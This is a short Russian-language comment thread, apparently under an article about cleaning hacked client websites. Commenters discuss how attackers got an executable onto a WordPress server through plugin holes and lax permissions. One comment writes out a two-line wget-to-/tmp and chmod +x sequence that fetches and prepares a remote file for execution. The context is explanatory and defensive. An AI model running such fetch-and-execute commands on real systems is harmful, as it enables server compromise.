Комментарии 6
А как файл, загруженный в WP, смог стать выполняемым?
"В данном случае клиент размещался не на виртуальном хостинге, а на vds. "
wget -O /tmp/file htts://url/path
chmod +x /tmp/file
настройки VPS соответствующие, видимо.
Я так понял, что у атакующих не было изначально доступа к командной строке, но каким-то образом они сумели через дырку в WordPress закачать туда исполняемый файл и запустить его... Иначе зачем он лежит в uploads?
я не сильно вебмастер, но в вордпрессе проблема - его плагины, писаные часто черте-кем, зачастую уже с дырками. А без плагинов вордпресс из себя мало что представляет.
Часто эти кривые плагины требуют всевозможных разрешений для PHP, таких как system_exec() например. Пользователи этой CMS часто бездумно выставляют chmod -R 777 /path/to/site "что бы все работало", пренебрегают ограничениями .htaccess и\или правилами реврайтов, бездумно включают опции в php.ini\fpm.conf.
По сему - самые распространенные, я бы сказал по своему опыту - 90% взломов современных сайтов на этой CMS да и вообще сайтов - это заливка шеллов, майнеров и т д. через дырки в скриптах плагинов, изменение их атрибутов, часто - заливка даже исходников и компиляция их. Конечно же, "самое верное решение" - это иметь установленный компилятор на веб-сервере.
Опытный администратор через ps aux увидит нестандартные процессы OS, запущенные от пользователя веб-сервера, или от пользователя форкера PHP. Так и произошло в описанном в статье случае.
Лечение сайта клиента в трех примерах
На vds сайт из примера 1 — на каком хостинге был сайт на wp из 2 примера — не уточняется.
Лечение сайта клиента в трех примерах